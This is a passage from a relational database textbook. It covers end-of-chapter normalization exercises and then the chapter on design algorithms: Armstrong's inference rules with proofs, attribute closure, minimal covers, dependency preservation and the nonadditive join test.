{Course_no} → {Offering_dept, Credit_hours, Course_level}
{Course_no, Sec_no, Semester, Year} → {Days_hours, Room_no,

No_of_students, Instructor_ssn}
{Room_no, Days_hours, Semester, Year} → {Instructor_ssn, Course_no,

Sec_no}

Try to determine which sets of attributes form keys of R. How would you
normalize this relation?

29. Consider the following relations for an order-processing application data-
base at ABC, Inc.

ORDER (O#, Odate, Cust#, Total_amount)
ORDER_ITEM(O#, I#, Qty_ordered, Total_price, Discount%)

Assume that each item has a different discount. The Total_price refers to one
item, Odate is the date on which the order was placed, and the Total_amount is
the amount of the order. If we apply a natural join on the relations
ORDER_ITEM and ORDER in this database, what does the resulting relation
schema look like? What will be its key? Show the FDs in this resulting rela-
tion. Is it in 2NF? Is it in 3NF? Why or why not? (State assumptions, if you
make any.)

546

Basics of Functional Dependencies and Normalization for Relational Databases

30. Consider the following relation:

CAR_SALE(Car#, Date_sold, Salesperson#, Commission%, Discount_amt)

Assume that a car may be sold by multiple salespeople, and hence {Car#,
Salesperson#} is the primary key. Additional dependencies are

Date_sold → Discount_amt and
Salesperson# → Commission%

Based on the given primary key, is this relation in 1NF, 2NF, or 3NF? Why or
why not? How would you successively normalize it completely?

31. Consider the following relation for published books:

BOOK (Book_title, Author_name, Book_type, List_price, Author_affil,
Publisher)

Author_affil refers to the affiliation of author. Suppose the following depen-
dencies exist:

Book_title → Publisher, Book_type
Book_type → List_price
Author_name → Author_affil

a. What normal form is the relation in? Explain your answer.

b. Apply normalization until you cannot decompose the relations further.
State the reasons behind each decomposition.

32. This exercise asks you to convert business statements into dependencies.
Consider the relation DISK_DRIVE (Serial_number, Manufacturer, Model, Batch,
Capacity, Retailer). Each tuple in the relation DISK_DRIVE contains informa-
tion about a disk drive with a unique Serial_number, made by a manufacturer,
with a particular model number, released in a certain batch, which has a cer-
tain storage capacity and is sold by a certain retailer. For example, the tuple
Disk_drive (‘1978619’, ‘WesternDigital’, ‘A2235X’, ‘765234’, 500, ‘CompUSA’)
specifies that WesternDigital made a disk drive with serial number 1978619
and model number A2235X, released in batch 765234; it is 500GB and sold
by CompUSA.

Write each of the following dependencies as an FD:

a. The manufacturer and serial number uniquely identifies the drive.

b. A model number is registered by a manufacturer and therefore can’t be
used by another manufacturer.

c. All disk drives in a particular batch are the same model.

d. All disk drives of a certain model of a particular manufacturer have
exactly the same capacity.

33. Consider the following relation:

R (Doctor#, Patient#, Date, Diagnosis, Treat_code, Charge)

547

Basics of Functional Dependencies and Normalization for Relational Databases

In the above relation, a tuple describes a visit of a patient to a doctor along
with a treatment code and daily charge. Assume that diagnosis is determined
(uniquely) for each patient by a doctor. Assume that each treatment code has
a fixed charge (regardless of patient). Is this relation in 2NF? Justify your
answer and decompose if necessary. Then argue whether further normaliza-
tion to 3NF is necessary, and if so, perform it.

34. Consider the following relation:

CAR_SALE (Car_id, Option_type, Option_listprice, Sale_date,
Option_discountedprice)

This relation refers to options installed in cars (e.g., cruise control) that were
sold at a dealership, and the list and discounted prices of the options.

If CarID → Sale_date and Option_type → Option_listprice and CarID,
Option_type → Option_discountedprice, argue using the generalized defini-
tion of the 3NF that this relation is not in 3NF. Then argue from your knowl-
edge of 2NF, why it is not even in 2NF.

35. Consider the relation:

BOOK (Book_Name, Author, Edition, Year)

with the data:

a. Based on a common-sense understanding of the above data, what are the
possible candidate keys of this relation?

b. Justify that this relation has the MVD { Book } →→ { Author } | { Edition, Year }.
c. What would be the decomposition of this relation based on the above

MVD? Evaluate each resulting relation for the highest normal form it
possesses.

36. Consider the following relation:

TRIP (Trip_id, Start_date, Cities_visited, Cards_used)

This relation refers to business trips made by company salespeople. Suppose
the TRIP has a single Start_date, but involves many Cities and salespeople may
use multiple credit cards on the trip. Make up a mock-up population of the
table.

a. Discuss what FDs and/or MVDs exist in this relation.

b. Show how you will go about normalizing it.

Book_Name Author Edition Copyright_Year

DB_fundamentals Navathe 4 2004
DB_fundamentals Elmasri 4 2004
DB_fundamentals Elmasri 5 2007
DB_fundamentals Navathe 5 2007

548

Basics of Functional Dependencies and Normalization for Relational Databases

Laboratory Exercise
Note: The following exercise use the DBD (Data Base Designer) system that is
described in the laboratory manual. The relational schema R and set of functional
dependencies F need to be coded as lists. As an example, R and F for this problem is
coded as:

R = [a, b, c, d, e, f, g, h, i, j]
F = [[[a, b],[c]],

[[a],[d, e]],
[[b],[f]],
[[f],[g, h]],
[[d],[i, j]]]

Since DBD is implemented in Prolog, use of uppercase terms is reserved for vari-
ables in the language and therefore lowercase constants are used to code the attrib-
utes. For further details on using the DBD system, please refer to the laboratory
manual.

37. Using the DBD system, verify your answers to the following exercises:

a. 15.24 (3NF only)

b. 15.25

c. 15.27

d. 15.28

Selected Bibliography
Functional dependencies were originally introduced by Codd (1970). The original
definitions of first, second, and third normal form were also defined in Codd
(1972a), where a discussion on update anomalies can be found. Boyce-Codd nor-
mal form was defined in Codd (1974). The alternative definition of third normal
form is given in Ullman (1988), as is the definition of BCNF that we give here.
Ullman (1988), Maier (1983), and Atzeni and De Antonellis (1993) contain many of
the theorems and proofs concerning functional dependencies.

549

Relational Database Design
Algorithms and Further

Dependencies

Atop-down relational design technique involvesdesigning an ER or EER conceptual schema, then
mapping it to the relational model. Primary keys are assigned to each relation based
on known functional dependencies. In the subsequent process, which may be called
relational design by analysis, initially designed relations from the above proce-
dure—or those inherited from previous files, forms, and other sources—are ana-
lyzed to detect undesirable functional dependencies. These dependencies are
removed by a successive normalization procedure.

In this chapter we use the theory of normal forms and functional, multivalued, and
join dependencies and build upon it while maintaining three different thrusts. First,
we discuss the concept of inferring new functional dependencies from a given set
and discuss notions including cover, minimal cover, and equivalence. Conceptually,
we need to capture the semantics of attibutes within a relation completely and

From Chapter 16 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

550

Relational Database Design Algorithms and Further Dependencies

succinctly, and the minimal cover allows us to do it. Second, we discuss the desirable
properties of nonadditive (lossless) joins and preservation of functional dependen-
cies. A general algorithm to test for nonadditivity of joins among a set of relations is
presented. Third, we present an approach to relational design by synthesis of func-
tional dependencies. This is a bottom-up approach to design that presupposes that
the known functional dependencies among sets of attributes in the Universe of
Discourse (UoD) have been given as input. We present algorithms to achieve the
desirable normal forms, namely 3NF and BCNF, and achieve one or both of the
desirable properties of nonadditivity of joins and functional dependency preserva-
tion. Although the synthesis approach is theoretically appealing as a formal
approach, it has not been used in practice for large database design projects because
of the difficulty of providing all possible functional dependencies up front before
the design can be attempted. Alternately, successive decompositions and ongoing
refinements to design become more manageable and may evolve over time. The
final goal of this chapter is to discuss further the multivalued dependency (MVD)
concept and briefly point out other types of dependencies.

In Section 1 we discuss the rules of inference for functional dependencies and use
them to define the concepts of a cover, equivalence, and minimal cover among func-
tional dependencies. In Section 2, first we describe the two desirable properties of
decompositions, namely, the dependency preservation property and the nonaddi-
tive (or lossless) join property, which are both used by the design algorithms to
achieve desirable decompositions. It is important to note that it is insufficient to test
the relation schemas independently of one another for compliance with higher nor-
mal forms like 2NF, 3NF, and BCNF. The resulting relations must collectively satisfy
these two additional properties to qualify as a good design. Section 3 is devoted to
the development of relational design algorithms that start off with one giant rela-
tion schema called the universal relation, which is a hypothetical relation contain-
ing all the attributes. This relation is decomposed (or in other words, the given
functional dependencies are synthesized) into relations that satisfy a certain normal
form like 3NF or BCNF and also meet one or both of the desirable properties.

In Section 5 we discuss the multivalued dependency (MVD) concept further by
applying the notions of inference, and equivalence to MVDs. Finally, in Section 6 we
complete the discussion on dependencies among data by introducing inclusion
dependencies and template dependencies. Inclusion dependencies can represent
referential integrity constraints and class/subclass constraints across relations.
Template dependencies are a way of representing any generalized constraint on
attributes. We also describe some situations where a procedure or function is
needed to state and verify a functional dependency among attributes. Then we
briefly discuss domain-key normal form (DKNF), which is considered the most
general normal form. Section 7 summarizes this chapter.

It is possible to skip some or all of Sections 3, 4, and 5 in an introductory database
course.

551

Relational Database Design Algorithms and Further Dependencies

1 Further Topics in Functional Dependencies:
Inference Rules, Equivalence, and Minimal
Cover

In the chapter “Basics of Functional Dependencies and Normalization for Relational
Databases,” we introduced the concept of functional dependencies (FDs), illustrated
it with some examples, and developed a notation to denote multiple FDs over a sin-
gle relation. We identified and discussed problematic functional dependencies and
showed how they can be eliminated by a proper decomposition of a relation. This
process was described as normalization and we showed how to achieve the first
through third normal forms (1NF through 3NF) given primary keys. We provided
generalized tests for 2NF (Second normal form), 3NF (Third normal form), and
BCNF (Boyce-Codd normal form) given any number of candidate keys in a relation
and showed how to achieve them. Now we return to the study of functional depen-
dencies and show how new dependencies can be inferred from a given set and discuss
the concepts of closure, equivalence, and minimal cover that we will need when we
later consider a synthesis approach to design of relations given a set of FDs.

1.1 Inference Rules for Functional Dependencies
We denote by F the set of functional dependencies that are specified on relation
schema R. Typically, the schema designer specifies the functional dependencies that
are semantically obvious; usually, however, numerous other functional dependencies
hold in all legal relation instances among sets of attributes that can be derived from
and satisfy the dependencies in F. Those other dependencies can be inferred or
deduced from the FDs in F.

In real life, it is impossible to specify all possible functional dependencies for a given
situation. For example, if each department has one manager, so that Dept_no
uniquely determines Mgr_ssn (Dept_no → Mgr_ssn), and a manager has a unique
phone number called Mgr_phone (Mgr_ssn → Mgr_phone), then these two dependen-
cies together imply that Dept_no → Mgr_phone. This is an inferred FD and need not
be explicitly stated in addition to the two given FDs. Therefore, it is useful to define
a concept called closure formally that includes all possible dependencies that can be
inferred from the given set F.

Definition. Formally, the set of all dependencies that include F as well as all
dependencies that can be inferred from F is called the closure of F; it is denoted
by F+.

For example, suppose that we specify the following set F of obvious functional
dependencies on a relation schema:

F = {Ssn → {Ename, Bdate, Address, Dnumber}, Dnumber → {Dname, Dmgr_ssn} }

Some of the additional functional dependencies that we can infer from F are the fol-
lowing:

Ssn → {Dname, Dmgr_ssn}
Ssn → Ssn
Dnumber → Dname

552

Relational Database Design Algorithms and Further Dependencies

An FD X → Y is inferred from a set of dependencies F specified on R if X → Y
holds in every legal relation state r of R; that is, whenever r satisfies all the depend-
encies in F, X → Y also holds in r. The closure F+ of F is the set of all functional
dependencies that can be inferred from F. To determine a systematic way to infer
dependencies, we must discover a set of inference rules that can be used to infer
new dependencies from a given set of dependencies. We consider some of these
inference rules next. We use the notation F |=X → Y to denote that the functional
dependency X → Y is inferred from the set of functional dependencies F.

In the following discussion, we use an abbreviated notation when discussing func-
tional dependencies. We concatenate attribute variables and drop the commas for
convenience. Hence, the FD {X,Y} → Z is abbreviated to XY → Z, and the FD {X, Y,
Z} → {U, V} is abbreviated to XYZ → UV. The following six rules IR1 through IR6
are well-known inference rules for functional dependencies:

IR1 (reflexive rule)1: If X ⊇ Y, then X →Y.
IR2 (augmentation rule)2: {X → Y} |=XZ → YZ.
IR3 (transitive rule): {X → Y, Y → Z} |=X → Z.
IR4 (decomposition, or projective, rule): {X → YZ} |=X → Y.
IR5 (union, or additive, rule): {X → Y, X → Z} |=X → YZ.
IR6 (pseudotransitive rule): {X → Y, WY → Z} |=WX → Z.

The reflexive rule (IR1) states that a set of attributes always determines itself or any
of its subsets, which is obvious. Because IR1 generates dependencies that are always
true, such dependencies are called trivial. Formally, a functional dependency X → Y
is trivial if X ⊇ Y; otherwise, it is nontrivial. The augmentation rule (IR2) says that
adding the same set of attributes to both the left- and right-hand sides of a depen-
dency results in another valid dependency. According to IR3, functional dependen-
cies are transitive. The decomposition rule (IR4) says that we can remove attributes
from the right-hand side of a dependency; applying this rule repeatedly can decom-
pose the FD X → {A1, A2, …, An} into the set of dependencies {X → A1, X → A2, …,
X → An}. The union rule (IR5) allows us to do the opposite; we can combine a set of
dependencies {X → A1, X → A2, …, X → An} into the single FD X → {A1, A2, …, An}.
The pseudotransitive rule (IR6) allows us to replace a set of attributes Y on the left
hand side of a dependency with another set X that functionally determines Y, and
can be derived from IR2 and IR3 if we augment the first functional dependency
X → Y with W (the augmentation rule) and then apply the transitive rule.

One cautionary note regarding the use of these rules. Although X → A and X → B
implies X → AB by the union rule stated above, X → A and Y → B does imply that
XY → AB. Also, XY → A does not necessarily imply either X → A or Y → A.

1The reflexive rule can also be stated as X → X; that is, any set of attributes functionally determines itself.
2The augmentation rule can also be stated as X → Y |=XZ → Y; that is, augmenting the left-hand side
attributes of an FD produces another valid FD.

553

Relational Database Design Algorithms and Further Dependencies

Each of the preceding inference rules can be proved from the definition of func-
tional dependency, either by direct proof or by contradiction. A proof by contradic-
tion assumes that the rule does not hold and shows that this is not possible. We now
prove that the first three rules IR1 through IR3 are valid. The second proof is by con-
tradiction.

Proof of IR1. Suppose that X ⊇ Y and that two tuples t1 and t2 exist in some rela-
tion instance r of R such that t1 [X] = t2 [X]. Then t1[Y] = t2[Y] because X ⊇ Y;
hence, X → Y must hold in r.
Proof of IR2 (by contradiction). Assume that X → Y holds in a relation instance
r of R but that XZ → YZ does not hold. Then there must exist two tuples t1 and
t2 in r such that (1) t1 [X] = t2 [X], (2) t1 [Y] = t2 [Y], (3) t1 [XZ] = t2 [XZ], and
(4) t1 [YZ] ≠ t2 [YZ]. This is not possible because from (1) and (3) we deduce
(5) t1 [Z] = t2 [Z], and from (2) and (5) we deduce (6) t1 [YZ] = t2 [YZ], contra-
dicting (4).

Proof of IR3. Assume that (1) X → Y and (2) Y → Z both hold in a relation r.
Then for any two tuples t1 and t2 in r such that t1 [X] = t2 [X], we must have (3)
t1 [Y] = t2 [Y], from assumption (1); hence we must also have (4) t1 [Z] = t2 [Z]
from (3) and assumption (2); thus X → Z must hold in r.

Using similar proof arguments, we can prove the inference rules IR4 to IR6 and any
additional valid inference rules. However, a simpler way to prove that an inference
rule for functional dependencies is valid is to prove it by using inference rules that
have already been shown to be valid. For example, we can prove IR4 through IR6 by
using IR1 through IR3 as follows.

Proof of IR4 (Using IR1 through IR3).

1. X → YZ (given).
2. YZ → Y (using IR1 and knowing that YZ ⊇ Y).
3. X → Y (using IR3 on 1 and 2).

Proof of IR5 (using IR1 through IR3).

1. X →Y (given).
2. X → Z (given).
3. X → XY (using IR2 on 1 by augmenting with X; notice that XX = X).
4. XY → YZ (using IR2 on 2 by augmenting with Y).
5. X → YZ (using IR3 on 3 and 4).

Proof of IR6 (using IR1 through IR3).

1. X → Y (given).
2. WY → Z (given).
3. WX → WY (using IR2 on 1 by augmenting with W).
4. WX → Z (using IR3 on 3 and 2).

It has been shown by Armstrong (1974) that inference rules IR1 through IR3 are
sound and complete. By sound, we mean that given a set of functional dependencies

554

Relational Database Design Algorithms and Further Dependencies

F specified on a relation schema R, any dependency that we can infer from F by
using IR1 through IR3 holds in every relation state r of R that satisfies the dependen-
cies in F. By complete, we mean that using IR1 through IR3 repeatedly to infer
dependencies until no more dependencies can be inferred results in the complete
set of all possible dependencies that can be inferred from F. In other words, the set of
dependencies F+, which we called the closure of F, can be determined from F by
using only inference rules IR1 through IR3. Inference rules IR1 through IR3 are
known as Armstrong’s inference rules.3

Typically, database designers first specify the set of functional dependencies F that
can easily be determined from the semantics of the attributes of R; then IR1, IR2,
and IR3 are used to infer additional functional dependencies that will also hold on
R. A systematic way to determine these additional functional dependencies is first to
determine each set of attributes X that appears as a left-hand side of some func-
tional dependency in F and then to determine the set of all attributes that are
dependent on X.

Definition. For each such set of attributes X, we determine the set X+ of attrib-
utes that are functionally determined by X based on F; X+ is called the closure
of X under F. Algorithm 1 can be used to calculate X+.

Algorithm 1. Determining X+, the Closure of X under F

Input: A set F of FDs on a relation schema R, and a set of attributes X, which is
a subset of R.

X+ := X;
repeat

oldX+ := X+;
for each functional dependency Y → Z in F do

if X+ ⊇ Y then X+ := X+ ∪ Z;
until (X+ = oldX+);

Algorithm 1 starts by setting X+ to all the attributes in X. By IR1, we know that all
these attributes are functionally dependent on X. Using inference rules IR3 and IR4,
we add attributes to X+, using each functional dependency in F. We keep going
through all the dependencies in F (the repeat loop) until no more attributes are
added to X+ during a complete cycle (of the for loop) through the dependencies in F.
For example, consider the relation schema EMP_PROJ; from the semantics of the
attributes, we specify the following set F of functional dependencies that should
hold on EMP_PROJ:

F = {Ssn → Ename,
Pnumber → {Pname, Plocation},
{Ssn, Pnumber} → Hours}

3They are actually known as Armstrong’s axioms. In the strict mathematical sense, the axioms (given
facts) are the functional dependencies in F, since we assume that they are correct, whereas IR1 through
IR3 are the inference rules for inferring new functional dependencies (new facts).

555

Relational Database Design Algorithms and Further Dependencies

Using Algorithm 1, we calculate the following closure sets with respect to F:

{Ssn} + = {Ssn, Ename}
{Pnumber} + = {Pnumber, Pname, Plocation}
{Ssn, Pnumber} + = {Ssn, Pnumber, Ename, Pname, Plocation, Hours}

Intuitively, the set of attributes in the right-hand side in each line above represents
all those attributes that are functionally dependent on the set of attributes in the
left-hand side based on the given set F.

1.2 Equivalence of Sets of Functional Dependencies
In this section we discuss the equivalence of two sets of functional dependencies.
First, we give some preliminary definitions.

Definition. A set of functional dependencies F is said to cover another set of
functional dependencies E if every FD in E is also in F+; that is, if every depen-
dency in E can be inferred from F; alternatively, we can say that E is covered by F.

Definition. Two sets of functional dependencies E and F are equivalent if
E+ = F+. Therefore, equivalence means that every FD in E can be inferred from
F, and every FD in F can be inferred from E; that is, E is equivalent to F if both
the conditions—E covers F and F covers E—hold.

We can determine whether F covers E by calculating X+ with respect to F for each FD
X → Y in E, and then checking whether this X+ includes the attributes in Y. If this is
the case for every FD in E, then F covers E. We determine whether E and F are equiv-
alent by checking that E covers F and F covers E. It is left to the reader as an exercise
to show that the following two sets of FDs are equivalent:

F = {A → C, AC → D, E → AD, E → H}
and G = {A → CD, E → AH}.

1.3 Minimal Sets of Functional Dependencies
Informally, a minimal cover of a set of functional dependencies E is a set of func-
tional dependencies F that satisfies the property that every dependency in E is in the
closure F+ of F. In addition, this property is lost if any dependency from the set F is
removed; F must have no redundancies in it, and the dependencies in F are in a
standard form. To satisfy these properties, we can formally define a set of functional
dependencies F to be minimal if it satisfies the following conditions:

1. Every dependency in F has a single attribute for its right-hand side.

2. We cannot replace any dependency X → A in F with a dependency Y → A,
where Y is a proper subset of X, and still have a set of dependencies that is
equivalent to F.

3. We cannot remove any dependency from F and still have a set of dependen-
cies that is equivalent to F.

We can think of a minimal set of dependencies as being a set of dependencies in a
standard or canonical form and with no redundancies. Condition 1 just represents

556

Relational Database Design Algorithms and Further Dependencies

every dependency in a canonical form with a single attribute on the right-hand
side.4 Conditions 2 and 3 ensure that there are no redundancies in the dependencies
either by having redundant attributes on the left-hand side of a dependency
(Condition 2) or by having a dependency that can be inferred from the remaining
FDs in F (Condition 3).

Definition. A minimal cover of a set of functional dependencies E is a minimal
set of dependencies (in the standard canonical form and without redundancy)
that is equivalent to E. We can always find at least one minimal cover F for any
set of dependencies E using Algorithm 2.

If several sets of FDs qualify as minimal covers of E by the definition above, it is cus-
tomary to use additional criteria for minimality. For example, we can choose the
minimal set with the smallest number of dependencies or with the smallest total
length (the total length of a set of dependencies is calculated by concatenating the
dependencies and treating them as one long character string).

Algorithm 2. Finding a Minimal Cover F for a Set of Functional Dependencies
E

Input: A set of functional dependencies E.

1. Set F := E.

2. Replace each functional dependency X → {A1, A2, …, An} in F by the n func-
tional dependencies X →A1, X →A2, …, X → An.

3. For each functional dependency X → A in F
for each attribute B that is an element of X

if { {F – {X → A} } ∪ { (X – {B} ) → A} } is equivalent to F
then replace X → A with (X – {B} ) → A in F.

4. For each remaining functional dependency X → A in F
if {F – {X → A} } is equivalent to F,

then remove X → A from F.

We illustrate the above algorithm with the following:

Let the given set of FDs be E : {B → A, D → A, AB → D}. We have to find the mini-
mal cover of E.

■ All above dependencies are in canonical form (that is, they have only one
attribute on the right-hand side), so we have completed step 1 of Algorithm
2 and can proceed to step 2. In step 2 we need to determine if AB → D has
any redundant attribute on the left-hand side; that is, can it be replaced by
B → D or A → D?

4This is a standard form to simplify the conditions and algorithms that ensure no redundancy exists in F.
By using the inference rule IR4, we can convert a single dependency with multiple attributes on the right-
hand side into a set of dependencies with single attributes on the right-hand side.

557

Relational Database Design Algorithms and Further Dependencies

■ Since B → A, by augmenting with B on both sides (IR2), we have BB → AB,
or B → AB (i). However, AB → D as given (ii).

■ Hence by the transitive rule (IR3), we get from (i) and (ii), B → D. Thus
AB → D may be replaced by B → D.

■ We now have a set equivalent to original E, say E�: {B → A, D → A, B → D}.
No further reduction is possible in step 2 since all FDs have a single attribute
on the left-hand side.

■ In step 3 we look for a redundant FD in E�. By using the transitive rule on
B → D and D → A, we derive B → A. Hence B → A is redundant in E� and
can be eliminated.

■ Therefore, the minimal cover of E is {B → D, D → A}.

In Section 3 we will see how relations can be synthesized from a given set of depend-
encies E by first finding the minimal cover F for E.

Next, we provide a simple algorithm to determine the key of a relation:

Algorithm 2(a). Finding a Key K for R Given a set F of Functional
Dependencies

Input: A relation R and a set of functional dependencies F on the attributes of
R.

1. Set K := R.

2. For each attribute A in K

{compute (K – A)+ with respect to F;

if (K – A)+ contains all the attributes in R, then set K := K – {A} };

In Algoritm 2(a), we start by setting K to all the attributes of R; we then remove one
attribute at a time and check whether the remaining attributes still form a superkey.
Notice, too, that Algorithm 2(a) determines only one key out of the possible candi-
date keys for R; the key returned depends on the order in which attributes are
removed from R in step 2.

2 Properties of Relational Decompositions
We now turn our attention to the process of decomposition to decompose relations
in order to get rid of unwanted dependencies and achieve higher normal forms. In
Section 2.1 we give examples to show that looking at an individual relation to test
whether it is in a higher normal form does not, on its own, guarantee a good design;
rather, a set of relations that together form the relational database schema must pos-
sess certain additional properties to ensure a good design. In Sections 2.2 and 2.3 we
discuss two of these properties: the dependency preservation property and the non-
additive (or lossless) join property. Section 2.4 discusses binary decompositions and
Section 2.5 discusses successive nonadditive join decompositions.

558

Relational Database Design Algorithms and Further Dependencies

2.1 Relation Decomposition and Insufficiency
of Normal Forms

The relational database design algorithms that we present in Section 3 start from a
single universal relation schema R = {A1, A2, …, An} that includes all the attributes
of the database. We implicitly make the universal relation assumption, which states
that every attribute name is unique. The set F of functional dependencies that
should hold on the attributes of R is specified by the database designers and is made
available to the design algorithms. Using the functional dependencies, the algo-
rithms decompose the universal relation schema R into a set of relation schemas D
= {R1, R2, …, Rm} that will become the relational database schema; D is called a
decomposition of R.

We must make sure that each attribute in R will appear in at least one relation
schema Ri in the decomposition so that no attributes are lost; formally, we have

This is called the attribute preservation condition of a decomposition.

Another goal is to have each individual relation Ri in the decomposition D be in
BCNF or 3NF. However, this condition is not sufficient to guarantee a good data-
base design on its own. We must consider the decomposition of the universal rela-
tion as a whole, in addition to looking at the individual relations. To illustrate this
point, consider the EMP_LOCS(Ename, Plocation) relation in Figure 5 from the chap-
ter “Basics of Functional Dependencies and Normalization for Relational
Databases” which is in 3NF and also in BCNF. In fact, any relation schema with only
two attributes is automatically in BCNF.5 Although EMP_LOCS is in BCNF, it still
gives rise to spurious tuples when joined with EMP_PROJ (Ssn, Pnumber, Hours,
Pname, Plocation), which is not in BCNF (see the result of the natural join in Figure
6 from the same chapter). Hence, EMP_LOCS represents a particularly bad relation
schema because of its convoluted semantics by which Plocation gives the location of
one of the projects on which an employee works. Joining EMP_LOCS with
PROJECT(Pname, Pnumber, Plocation, Dnum) in Figure 2 from the chapter “Basics of
Functional Dependencies and Normalization for Relational Databases”—which is
in BCNF—using Plocation as a joining attribute also gives rise to spurious tuples.
This underscores the need for other criteria that, together with the conditions of
3NF or BCNF, prevent such bad designs. In the next three subsections we discuss
such additional conditions that should hold on a decomposition D as a whole.

2.2 Dependency Preservation Property
of a Decomposition

It would be useful if each functional dependency X→Y specified in F either
appeared directly in one of the relation schemas Ri in the decomposition D or could
be inferred from the dependencies that appear in some Ri. Informally, this is the
dependency preservation condition. We want to preserve the dependencies because

R Ri
i

m

=
=

1

5As an exercise, the reader should prove that this statement is true.

559

Relational Database Design Algorithms and Further Dependencies

each dependency in F represents a constraint on the database. If one of the depen-
dencies is not represented in some individual relation Ri of the decomposition, we
cannot enforce this constraint by dealing with an individual relation. We may have
to join multiple relations so as to include all attributes involved in that dependency.

It is not necessary that the exact dependencies specified in F appear themselves in
individual relations of the decomposition D. It is sufficient that the union of the
dependencies that hold on the individual relations in D be equivalent to F. We now
define these concepts more formally.

Definition. Given a set of dependencies F on R, the projection of F on Ri,
denoted by πRi(F) where Ri is a subset of R, is the set of dependencies X → Y in
F+ such that the attributes in X ∪ Y are all contained in Ri. Hence, the projec-
tion of F on each relation schema Ri in the decomposition D is the set of func-
tional dependencies in F+, the closure of F, such that all their left- and
right-hand-side attributes are in Ri. We say that a decomposition D = {R1,
R2, …, Rm} of R is dependency-preserving with respect to F if the union of the
projections of F on each Ri in D is equivalent to F; that is, ((πR1(F)) ∪ … ∪
(πRm(F)))

+ = F+.

If a decomposition is not dependency-preserving, some dependency is lost in the
decomposition. To check that a lost dependency holds, we must take the JOIN of
two or more relations in the decomposition to get a relation that includes all left-
and right-hand-side attributes of the lost dependency, and then check that the
dependency holds on the result of the JOIN—an option that is not practical.

An example of a decomposition that does not preserve dependencies is shown in
Figure 13 (a) from the chapter “Basics of Functional Dependencies and
Normalization for Relational Databases,” in which the functional dependency FD2
is lost when LOTS1A is decomposed into {LOTS1AX, LOTS1AY}. From the same
chapter, the decompositions in Figure 12, however, are dependency-preserving;
similarly, for the example in Figure 14, no matter what decomposition is chosen for
the relation TEACH(Student, Course, Instructor) from the three provided in the text,
one or both of the dependencies originally present are bound to be lost. We state a
claim below related to this property without providing any proof.

Claim 1. It is always possible to find a dependency-preserving decomposition
D with respect to F such that each relation Ri in D is in 3NF.

In Section 3.1, we describe Algorithm 4, which creates a dependency-
preserving decomposition D = {R1, R2, …, Rm} of a universal relation R based on a
set of functional dependencies F, such that each Ri in D is in 3NF.

2.3 Nonadditive (Lossless) Join Property
of a Decomposition

Another property that a decomposition D should possess is the nonadditive join
property, which ensures that no spurious tuples are generated when a NATURAL
JOIN operation is applied to the relations resulting from the decomposition. We
already illustrated this problem in Section 1.4 from the chapter “Basics of

560

Relational Database Design Algorithms and Further Dependencies

Functional Dependencies and Normalization for Relational Databases” with the
example from that chapter in Figures 5 and 6. Because this is a property of a decom-
position of relation schemas, the condition of no spurious tuples should hold on
every legal relation state—that is, every relation state that satisfies the functional
dependencies in F. Hence, the lossless join property is always defined with respect to
a specific set F of dependencies.

Definition. Formally, a decomposition D = {R1, R2, …, Rm} of R has the lossless
(nonadditive) join property with respect to the set of dependencies F on R if,
for every relation state r of R that satisfies F, the following holds, where * is the
NATURAL JOIN of all the relations in D: *(πR1(r), …, πRm(r)) = r.

The word loss in lossless refers to loss of information, not to loss of tuples. If a decom-
position does not have the lossless join property, we may get additional spurious
tuples after the PROJECT (π) and NATURAL JOIN (*) operations are applied; these
additional tuples represent erroneous or invalid information. We prefer the term
nonadditive join because it describes the situation more accurately. Although the
term lossless join has been popular in the literature, we will henceforth use the term
nonadditive join, which is self-explanatory and unambiguous. The nonadditive join
property ensures that no spurious tuples result after the application of PROJECT and
JOIN operations. We may, however, sometimes use the term lossy design to refer to a
design that represents a loss of information (see example at the end of Algorithm 4).

The decomposition of EMP_PROJ(Ssn, Pnumber, Hours, Ename, Pname, Plocation) in
Figure 3 from the chapter “Basics of Functional Dependencies and Normalization
for Relational Databases” into EMP_LOCS(Ename, Plocation) and EMP_PROJ1(Ssn,
Pnumber, Hours, Pname, Plocation) in Figure 5 (same chapter) obviously does not
have the nonadditive join property, as illustrated by Figure 6 (same chapter). We will
use a general procedure for testing whether any decomposition D of a relation into
n relations is nonadditive with respect to a set of given functional dependencies F in
the relation; it is presented as Algorithm 3 below. It is possible to apply a simpler test
to check if the decomposition is nonadditive for binary decompositions; that test is
described in Section 2.4.

Algorithm 3. Testing for Nonadditive Join Property

Input: A universal relation R, a decomposition D = {R1, R2, …, Rm} of R, and a
set F of functional dependencies.

Note: Explanatory comments are given at the end of some of the steps. They fol-
low the format: (* comment *).

1. Create an initial matrix S with one row i for each relation Ri in D, and one
column j for each attribute Aj in R.

2. Set S(i, j):= bij for all matrix entries. (* each bij is a distinct symbol associated
with indices (i, j) *).

3. For each row i representing relation schema Ri
{for each column j representing attribute Aj

{if (relation Ri includes attribute Aj) then set S(i, j):= aj;};}; (* each aj is a
distinct symbol associated with index ( j) *).

561

Relational Database Design Algorithms and Further Dependencies

4. Repeat the following loop until a complete loop execution results in no
changes to S
{for each functional dependency X → Y in F

{for all rows in S that have the same symbols in the columns corresponding
to attributes in X

{make the symbols in each column that correspond to an attribute in Y
be the same in all these rows as follows: If any of the rows has an a sym-
bol for the column, set the other rows to that same a symbol in the col-
umn. If no a symbol exists for the attribute in any of the rows, choose
one of the b symbols that appears in one of the rows for the attribute
and set the other rows to that same b symbol in the column ;} ; } ;};

5. If a row is made up entirely of a symbols, then the decomposition has the
nonadditive join property; otherwise, it does not.

Given a relation R that is decomposed into a number of relations R1, R2, …, Rm,
Algorithm 3 begins the matrix S that we consider to be some relation state r of R.
Row i in S represents a tuple ti (corresponding to relation Ri) that has a symbols in
the columns that correspond to the attributes of Ri and b symbols in the remaining
columns. The algorithm then transforms the rows of this matrix (during the loop in
step 4) so that they represent tuples that satisfy all the functional dependencies in F.
At the end of step 4, any two rows in S—which represent two tuples in r—that agree
in their values for the left-hand-side attributes X of a functional dependency X → Y
in F will also agree in their values for the right-hand-side attributes Y. It can be
shown that after applying the loop of step 4, if any row in S ends up with all a sym-
bols, then the decomposition D has the nonadditive join property with respect to F.

If, on the other hand, no row ends up being all a symbols, D does not satisfy the
lossless join property. In this case, the relation state r represented by S at the end of
the algorithm will be an example of a relation state r of R that satisfies the depend-
encies in F but does not satisfy the nonadditive join condition. Thus, this relation
serves as a counterexample that proves that D does not have the nonadditive join
property with respect to F. Note that the a and b symbols have no special meaning
at the end of the algorithm.

